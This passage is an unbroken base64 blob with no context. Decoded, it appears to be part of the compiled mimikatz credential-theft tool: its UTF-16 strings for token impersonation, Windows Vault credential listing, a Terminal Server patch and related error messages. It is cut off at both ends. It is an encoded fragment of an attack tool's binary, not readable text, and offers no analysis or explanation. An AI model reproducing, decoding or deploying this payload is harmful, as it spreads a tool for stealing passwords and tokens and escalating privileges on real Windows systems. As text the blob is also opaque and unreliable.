wAYQBiAGwAZQAKAAAAAAAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABzAGUAcgB2AGkAYwBlACAAbgBhAG0AZQAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAABTAHQAYQByAHQAaQBuAGcAAAAAAFIAZQBtAG8AdgBpAG4AZwAAAAAAUwB0AG8AcABwAGkAbgBnAAAAAABTAHUAcwBwAGUAbgBkAGkAbgBnAAAAAABSAGUAcwB1AG0AaQBuAGcAAAAAAFAAcgBlAHMAaAB1AHQAZABvAHcAbgAAAFMAaAB1AHQAZABvAHcAbgAAAAAAcwBlAHIAdgBpAGMAZQBzAC4AZQB4AGUAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAABlAHIAcgBvAHIAIAAlAHUACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHcAaQB0AGgAbwB1AHQAIABTAGMAUwBlAG4AZABDAG8AbgB0AHIAbwBsAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABlAHgAaQB0AAAAAABRAHUAaQB0ACAAbQBpAG0AaQBrAGEAdAB6AAAAYwBsAHMAAAAAAAAAQwBsAGUAYQByACAAcwBjAHIAZQBlAG4AIAAoAGQAbwBlAHMAbgAnAHQAIAB3AG8AcgBrACAAdwBpAHQAaAAgAHIAZQBkAGkAcgBlAGMAdABpAG8AbgBzACwAIABsAGkAawBlACAAUABzAEUAeABlAGMAKQAAAAAAYQBuAHMAdwBlAHIAAAAAAEEAbgBzAHcAZQByACAAdABvACAAdABoAGUAIABVAGwAdABpAG0AYQB0AGUAIABRAHUAZQBzAHQAaQBvAG4AIABvAGYAIABMAGkAZgBlACwAIAB0AGgAZQAgAFUAbgBpAHYAZQByAHMAZQAsACAAYQBuAGQAIABFAHYAZQByAHkAdABoAGkAbgBnAAAAYwBvAGYAZgBlAGUAAAAAAFAAbABlAGEAcwBlACwAIABtAGEAawBlACAAbQBlACAAYQAgAGMAbwBmAGYAZQBlACEAAABzAGwAZQBlAHAAAAAAAAAAUwBsAGUAZQBwACAAYQBuACAAYQBtAG8AdQBuAHQAIABvAGYAIABtAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAAAEwAbwBnACAAbQBpAG0AaQBrAGEAdAB6ACAAaQBuAHAAdQB0AC8AbwB1AHQAcAB1AHQAIAB0AG8AIABmAGkAbABlAAAAYgBhAHMAZQA2ADQAAAAAAAAAAABTAHcAaQB0AGMAaAAgAGYAaQBsAGUAIABvAHUAdABwAHUAdAAvAGIAYQBzAGUANgA0ACAAbwB1AHQAcAB1AHQAAAAAAHYAZQByAHMAaQBvAG4AAAAAAAAARABpAHMAcABsAGEAeQAgAHMAbwBtAGUAIAB2AGUAcgBzAGkAbwBuACAAaQBuAGYAbwByAG0AYQB0AGkAbwBuAHMAAABjAGQAAAAAAAAAAABDAGgAYQBuAGcAZQAgAG8AcgAgAGQAaQBzAHAAbABhAHkAIABjAHUAcgByAGUAbgB0ACAAZABpAHIAZQBjAHQAbwByAHkAAABtAGEAcgBrAHIAdQBzAHMAAAAAAE0AYQByAGsAIABhAGIAbwB1AHQAIABQAHQASAAAAAAAcwB0AGEAbgBkAGEAcgBkAAAAAABTAHQAYQBuAGQAYQByAGQAIABtAG8AZAB1AGwAZQAAAEIAYQBzAGkAYwAgAGMAbwBtAG0AYQBuAGQAcwAgACgAZABvAGUAcwAgAG4AbwB0ACAAcgBlAHEAdQBpAHIAZQAgAG0AbwBkAHUAbABlACAAbgBhAG0AZQApAAAAQgB5AGUAIQAKAAAANAAyAC4ACgAAAAAAAAAAAAoAIAAgACAAIAAoACAAKAAKACAAIAAgACAAIAApACAAKQAKACAAIAAuAF8AXwBfAF8AXwBfAC4ACgAgACAAfAAgACAAIAAgACAAIAB8AF0ACgAgACAAXAAgACAAIAAgACAAIAAvAAoAIAAgACAAYAAtAC0ALQAtACcACgAAAAAAUwBsAGUAZQBwACAAOgAgACUAdQAgAG0AcwAuAC4ALgAgAAAARQBuAGQAIAAhAAoAAAAAAG0AaQBtAGkAawBhAHQAegAuAGwAbwBnAAAAAABVAHMAaQBuAGcAIAAnACUAcwAnACAAZgBvAHIAIABsAG8AZwBmAGkAbABlACAAOgAgACUAcwAKAAAAAAB0AHIAdQBlAAAAAABmAGEAbABzAGUAAABpAHMAQgBhAHMAZQA2ADQASQBuAHQAZQByAGMAZQBwAHQAIAB3AGEAcwAgACAAIAAgADoAIAAlAHMACgAAAAAAaQBzAEIAYQBzAGUANgA0AEkAbgB0AGUAcgBjAGUAcAB0ACAAaQBzACAAbgBvAHcAIAA6ACAAJQBzAAoAAAAAADYANAAAAAAAOAA2AAAAAAAAAAAACgBtAGkAbQBpAGsAYQB0AHoAIAAyAC4AMQAgACgAYQByAGMAaAAgAHgAOAA2ACkACgBXAGkAbgBkAG8AdwBzACAATgBUACAAJQB1AC4AJQB1ACAAYgB1AGkAbABkACAAJQB1ACAAKABhAHIAYwBoACAAeAAlAHMAKQAKAG0AcwB2AGMAIAAlAHUAIAAlAHUACgAAAEMAdQByADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB0AGEAbgBkAGEAcgBkAF8AYwBkACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAGcAZQB0AEMAdQByAHIAZQBuAHQARABpAHIAZQBjAHQAbwByAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgBlAHcAOgAgACUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAdABhAG4AZABhAHIAZABfAGMAZAAgADsAIABTAGUAdABDAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFMAbwByAHIAeQAgAHkAbwB1ACAAZwB1AHkAcwAgAGQAbwBuACcAdAAgAGcAZQB0ACAAaQB0AC4ACgAAAEwAaQBzAHQAIAAuAC4ALgAAAAAAZwBlAHQAAABHAGUAdAAgAC4ALgAuAAAAcwBlAHQAAABTAGUAdAAgAC4ALgAuAAAAZABlAGwAAABEAGUAbAAgAC4ALgAuAAAAAAAAAFMAeQBzAHQAZQBtACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAVgBhAGwAdQBlACAAbQBvAGQAdQBsAGUAAABOAGEAbQBlACAAIAAgACAAIAAgACAAOgAgACUAcwAKAFYAZQBuAGQAbwByACAARwBVAEkARAA6ACAAAAAAAAAAKQAKAEwAZQBuAGcAdABoACAAIAAgACAAIAA6ACAAJQB1AAoARABhAHQAYQAgACAAIAAgACAAIAAgADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBsAGkAcwB0ACAAOwAgAE4AdABFAG4AdQBtAGUAcgBhAHQAZQBTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAHMARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AbABpAHMAdAAgADsAIABOAHQARQBuAHUAbQBlAHIAYQB0AGUAUwB5AHMAdABlAG0ARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQBsAHUAZQBzAEUAeAAoAHMAaQB6AGUAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAQQB0AHQAcgBpAGIAdQB0AGUAcwAgADoAIAAlADAAOAB4ACAAKAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBnAGUAdAAgADsAIABOAHQAUQB1AGUAcgB5AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGcAZQB0ACAAOwAgAFMAeQBzAHQAZQBtACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAVgBhAHIAaQBhAGIAbABlACAAbgBvAHQAIABmAG8AdQBuAGQALgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBnAGUAdAAgADsAIABOAHQAUQB1AGUAcgB5AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAcwBpAHoAZQApADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGcAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAHsAYgAxADYAYgAwADAAYgA1AC0AYwBhAGYAZQAtAGIAYQBiAGUALQAwAGUAZQAwAC0AZABhAGIAYQBkAGEAYgBhAGQAMAAwADAAfQAAAAAANAAxADAAMAAyADAAMAAwADQAYwAwADAANgAxADAAMAAyADAAMAAwADUANgAwADAANgA5ADAAMAA2ADUAMAAwADIAYwAwADAAMgAwADAAMAA0ADEAMAAwADIAMAAwADAANABjADAAMAAyADcAMAAwADQAMQAwADAANgBkADAAMAA2AGYAMAAwADcANQAwADAANwAyADAAMAAwADAAMAAwAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAHMAZQB0ACAAOwAgAE4AdABTAGUAdABTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAEUAeAAoAGQAYQB0AGEAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAHMAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBkAGUAbAAgADsAIABTAHkAcwB0AGUAbQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAFYAYQByAGkAYQBiAGwAZQAgAG4AbwB0ACAAZgBvAHUAbgBkAC4ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZABlAGwAIAA7ACAATgB0AFMAZQB0AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZABlAGwAIAA7ACAAUgB0AGwARwBVAEkARABGAHIAbwBtAFMAdAByAGkAbgBnADoAIAAwAHgAJQAwADgAeAAKAAAAAABOAE8ATgBfAFYATwBMAEEAVABJAEwARQAAAAAAQgBPAE8AVABTAEUAUgBWAEkAQwBFAF8AQQBDAEMARQBTAFMAAAAAAFIAVQBOAFQASQBNAEUAXwBBAEMAQwBFAFMAUwAAAAAASABBAFIARABXAEEAUgBFAF8ARQBSAFIATwBSAF8AUgBFAEMATwBSAEQAAABBAFUAVABIAEUATgBUAEkAQwBBAFQARQBEAF8AVwBSAEkAVABFAF8AQQBDAEMARQBTAFMAAAAAAAAAAABUAEkATQBFAF8AQgBBAFMARQBEAF8AQQBVAFQASABFAE4AVABJAEMAQQBUAEUARABfAFcAUgBJAFQARQBfAEEAQwBDAEUAUwBTAAAAQQBQAFAARQBOAEQAXwBXAFIASQBUAEUAAAAAAEsAaQB3AGkARQBmAGkAVgBhAHIAaQBhAGIAbABlAHMAAAAAAEUAZgBpAEIAbwBvAHQAVgBhAHIAaQBhAGIAbABlAHMAAAAAAEUAeABwAFMAZQBjAHUAcgBlAEIAbwBvAHQAVgBlAG4AZABvAHIAAAAlAHMAIAAtACAAAAB3AGgAbwBhAG0AaQAAAAAARABpAHMAcABsAGEAeQAgAGMAdQByAHIAZQBuAHQAIABpAGQAZQBuAHQAaQB0AHkAAAAAAEwAaQBzAHQAIABhAGwAbAAgAHQAbwBrAGUAbgBzACAAbwBmACAAdABoAGUAIABzAHkAcwB0AGUAbQAAAGUAbABlAHYAYQB0AGUAAABJAG0AcABlAHIAcwBvAG4AYQB0AGUAIABhACAAdABvAGsAZQBuAAAAcgBlAHYAZQByAHQAAAAAAFIAZQB2AGUAcgB0ACAAdABvACAAcAByAG8AYwBlAHMAIAB0AG8AawBlAG4AAAAAAHQAbwBrAGUAbgAAAFQAbwBrAGUAbgAgAG0AYQBuAGkAcAB1AGwAYQB0AGkAbwBuACAAbQBvAGQAdQBsAGUAAAAgACoAIABQAHIAbwBjAGUAcwBzACAAVABvAGsAZQBuACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AdwBoAG8AYQBtAGkAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAgACoAIABUAGgAcgBlAGEAZAAgAFQAbwBrAGUAbgAgACAAOgAgAAAAbgBvACAAdABvAGsAZQBuAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwB3AGgAbwBhAG0AaQAgADsAIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAZABvAG0AYQBpAG4AYQBkAG0AaQBuAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBnAGUAdABDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAFMASQBEACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlACAAOwAgAE4AbwAgAHUAcwBlAHIAbgBhAG0AZQAgAGEAdgBhAGkAbABhAGIAbABlACAAdwBoAGUAbgAgAFMAWQBTAFQARQBNAAoAAABUAG8AawBlAG4AIABJAGQAIAAgADoAIAAlAHUACgBVAHMAZQByACAAbgBhAG0AZQAgADoAIAAlAHMACgBTAEkARAAgAG4AYQBtAGUAIAAgADoAIAAAAAAAJQBzAFwAJQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABOAGEAbQBlAEQAbwBtAGEAaQBuAEYAcgBvAG0AUwBJAEQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBDAHIAZQBhAHQAZQBXAGUAbABsAEsAbgBvAHcAbgBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAHIAZQB2AGUAcgB0ACAAOwAgAFMAZQB0AFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABBAG4AbwBuAHkAbQBvAHUAcwAAAEkAZABlAG4AdABpAGYAaQBjAGEAdABpAG8AbgAAAAAASQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgAAAEQAZQBsAGUAZwBhAHQAaQBvAG4AAAAAAFUAbgBrAG4AbwB3AG4AAAAlAC0AMQAwAHUACQAAAAAAJQBzAFwAJQBzAAkAJQBzAAAAAAAJACgAJQAwADIAdQBnACwAJQAwADIAdQBwACkACQAlAHMAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQBfAGMAYQBsAGwAYgBhAGMAawAgADsAIABDAGgAZQBjAGsAVABvAGsAZQBuAE0AZQBtAGIAZQByAHMAaABpAHAAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAJQB1AAkAAAAgAC0APgAgAEkAbQBwAGUAcgBzAG8AbgBhAHQAZQBkACAAIQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAXwBjAGEAbABsAGIAYQBjAGsAIAA7ACAAUwBlAHQAVABoAHIAZQBhAGQAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAG0AdQBsAHQAaQByAGQAcAAAAAAAAAAAAFsAZQB4AHAAZQByAGkAbQBlAG4AdABhAGwAXQAgAHAAYQB0AGMAaAAgAFQAZQByAG0AaQBuAGEAbAAgAFMAZQByAHYAZQByACAAcwBlAHIAdgBpAGMAZQAgAHQAbwAgAGEAbABsAG8AdwAgAG0AdQBsAHQAaQBwAGwAZQBzACAAdQBzAGUAcgBzAAAAdABzAAAAAABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAG0AbwBkAHUAbABlAAAAAAB0AGUAcgBtAHMAcgB2AC4AZABsAGwAAABUAGUAcgBtAFMAZQByAHYAaQBjAGUAAAAAAAAAVwBpAG4AZABvAHcAcwAgAFYAYQB1AGwAdAAvAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABtAG8AZAB1AGwAZQAAAHYAYQB1AGwAdABjAGwAaQAAAAAAVmF1bHRFbnVtZXJhdGVJdGVtVHlwZXMAVmF1bHRFbnVtZXJhdGVWYXVsdHMAAAAAVmF1bHRPcGVuVmF1bHQAAFZhdWx0R2V0SW5mb3JtYXRpb24AVmF1bHRFbnVtZXJhdGVJdGVtcwBWYXVsdENsb3NlVmF1bHQAVmF1bHRGcmVlAAAAVmF1bHRHZXRJdGVtAAAAAEQAbwBtAGEAaQBuACAAUABhAHMAcwB3AG8AcgBkAAAARABvAG0AYQBpAG4AIABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAAAAAAEQAbwBtAGEAaQBuACAARQB4AHQAZQBuAGQAZQBkAAAAUABpAG4AIABMAG8AZwBvAG4AAABQAGkAYwB0AHUAcgBlACAAUABhAHMAcwB3AG8AcgBkAAAAAABCAGkAbwBtAGUAdAByAGkAYwAAAE4AZQB4AHQAIABHAGUAbgBlAHIAYQB0AGkAbwBuACAAQwByAGUAZABlAG4AdABpAGEAbAAAAAAACgBWAGEAdQBsAHQAIAA6ACAAAAAJAEkAdABlAG0AcwAgACgAJQB1ACkACgAAAAAACQAgACUAMgB1AC4ACQAlAHMACgAAAAAACQAJAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAJAAkATABhAHMAdABXAHIAaQB0AHQAZQBuACAAIAAgACAAIAA6ACAAAAAAAAkACQBGAGwAYQBnAHMAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4AAoAAAAJAAkAUgBlAHMAcwBvAHUAcgBjAGUAIAAgACAAIAAgACAAIAA6ACAAAAAAAAkACQBJAGQAZQBuAHQAaQB0AHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAACQAJAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABvAHIAIAAgACAAOgAgAAAAAAAJAAkAUAByAG8AcABlAHIAdAB5ACAAJQAyAHUAIAAgACAAIAAgADoAIAAAAAkACQAqAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABvAHIAKgAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA3ACAAOgAgACUAMAA4AHgAAAAAAAkACQBQAGEAYwBrAGEAZwBlAFMAaQBkACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA4ACAAOgAgACUAMAA4AHgAAAAAAAoACQAJACoAKgAqACAAJQBzACAAKgAqACoACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0ACAAOwAgAFYAYQB1AGwAdABFAG4AdQBtAGUAcgBhAHQAZQBWAGEAdQBsAHQAcwAgADoAIAAwAHgAJQAwADgAeAAKAAAAAAAJAAkAVQBzAGUAcgAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAACUAcwBcACUAcwAAAAAAAABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AXABMAG8AZwBvAG4AVQBJAFwAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQAAAAAAGIAZwBQAGEAdABoAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIAAyACAAOgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgADEAIAA6ACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUwBJAEQAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQAIAA6ACAAJQAwADgAeAAKAAAAAAAJAAkAUABhAHMAcwB3AG8AcgBkACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAkACQBQAEkATgAgAEMAbwBkAGUAIAAgACAAIAAgACAAIAAgADoAIAAlADAANABoAHUACgAAAAAACQAJAEIAYQBjAGsAZwByAG8AdQBuAGQAIABwAGEAdABoACAAOgAgACUAcwAKAAAACQAJAFAAaQBjAHQAdQByAGUAIABwAGEAcwBzAHcAbwByAGQAIAAoAGcAcgBpAGQAIABpAHMAIAAxADUAMAAqADEAMAAwACkACgAAAAkACQAgAFsAJQB1AF0AIAAAAAAAcABvAGkAbgB0ACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApAAAAAABjAGwAbwBjAGsAdwBpAHMAZQAAAGEAbgB0AGkAYwBsAG8AYwBrAHcAaQBzAGUAAABjAGkAcgBjAGwAZQAgACgAeAAgAD0AIAAlADMAdQAgADsAIAB5ACAAPQAgACUAMwB1ACAAOwAgAHIAIAA9ACAAJQAzAHUAKQAgAC0AIAAlAHMAAAAAAAAAbABpAG4AZQAgACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApACAALQA+ACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAKQAAACUAdQAKAAAACQAJAFAAcgBvAHAAZQByAHQAeQAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAlAC4AKgBzAFwAAAB0AG8AZABvACAAPwAKAAAACQBOAGEAbQBlACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAdABlAG0AcAAgAHYAYQB1AGwAdAAAAAAACQBQAGEAdABoACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAWwBVAFMASABPAFIAVABdACAAJQBoAHUAAAAAAFsARABXAE8AUgBEAF0AIAAlAHUAAAAAAFsAUwBUAFIASQBOAEcAXQAgACUAcwAAAFsAQgBZAFQARQAqAF0AIAAAAAAAWwBTAEkARABdACAAAAAAAFsAQQBUAFQAUgBJAEIAVQBUAEUAXQAKAAAAAAAJAAkAIAAgAEYAbABhAGcAcwAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAACQAJACAAIABLAGUAeQB3AG8AcgBkACAAOgAgACUAcwAKAAAACQAJACAAIABWAGEAbAB1AGUAIAAgACAAOgAgAAAAAABbAFQAeQBwAGUAIAAlADIAdQBdACAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAI